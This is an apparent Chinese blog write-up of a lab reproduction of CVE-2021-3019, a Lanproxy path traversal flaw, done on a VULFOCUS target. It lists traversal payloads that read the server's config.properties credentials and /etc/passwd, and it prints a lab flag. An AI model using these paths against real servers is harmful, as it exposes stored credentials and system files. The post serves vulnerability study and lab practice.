[文件读取]lanproxy 文件读取 (CVE-2021-3019)

wj333332023-11-14 23:10

1.1漏洞描述

|------|---------------|
| 漏洞编号 | CVE-2021-3019 |
| 漏洞类型 | 文件读取 |
| 漏洞等级 | ⭐ |
| 漏洞环境 | VULFOCUS |
| 攻击方式 | |

描述: Lanproxy 路径遍历漏洞通过../绕过读取任意文件。该漏洞允许目录遍历读取/../conf/config.properties来获取到内部网连接的凭据。

1.2漏洞等级

高危

1.3影响版本

Lanproxy

1.4漏洞复现

1.4.1.基础环境

|----|-----------|
| 靶场 | VULFOCUS |
| 工具 | BurpSuite |
| | |

1.4.2.前提

  • 网站后台地址:

  • 后台管理账密:

  • 后台登录地址 :

1.5深度利用

1.5.1漏洞点

/../conf/config.properties

查看内部网连接的凭据

查看/etc/passwd

../../../../../etc/passwd

查看tmp/flag

../../../../../tmp/flag

拿到flag

flag-{bmh909dda7b-bfc7-464d-97ee-0c81c36001b2}

1.6漏洞挖掘

1.6.1指纹信息

1.7修复建议

  • 升级
  • 打补丁
  • 上设备
相关推荐
漏洞谷10 小时前
白帽子为什么几乎都绕不开 httpx:一款 HTTP 资产探测工具的技术价值
web安全·漏洞挖掘·安全工具
用户962377954484 天前
VulnHub DC-3 靶机渗透测试笔记
安全
叶落阁主5 天前
Tailscale 完全指南:从入门到私有 DERP 部署
运维·安全·远程工作
用户962377954486 天前
DVWA 靶场实验报告 (High Level)
安全
数据智能老司机7 天前
用于进攻性网络安全的智能体 AI——在 n8n 中构建你的第一个 AI 工作流
人工智能·安全·agent
数据智能老司机7 天前
用于进攻性网络安全的智能体 AI——智能体 AI 入门
人工智能·安全·agent
用户962377954487 天前
DVWA 靶场实验报告 (Medium Level)
安全
red1giant_star7 天前
S2-067 漏洞复现:Struts2 S2-067 文件上传路径穿越漏洞
安全
用户962377954487 天前
DVWA Weak Session IDs High 的 Cookie dvwaSession 为什么刷新不出来?
安全
cipher8 天前
ERC-4626 通胀攻击:DeFi 金库的"捐款陷阱"
前端·后端·安全
热门推荐
01GitHub 镜像站点02OpenClaw 使用和管理 MCP 完全指南03OpenClaw 连接飞书完整指南:插件安装、配置与踩坑记录04本地部署 OpenClaw + DeepSeek-R1 完全指南05Window 10部署openclaw报错node.exe : npm error code 12806OpenClaw + 飞书(Feishu)环境搭建指南07npm-error code 128问题解决方法08OpenClaw 飞书机器人不回复消息?3 小时踩坑总结09Clawdbot部署教程:解决‘gateway token missing’授权问题的完整步骤10Claude Code + GLM4.7 避坑指南:解决 Unable to connect to Anthropic services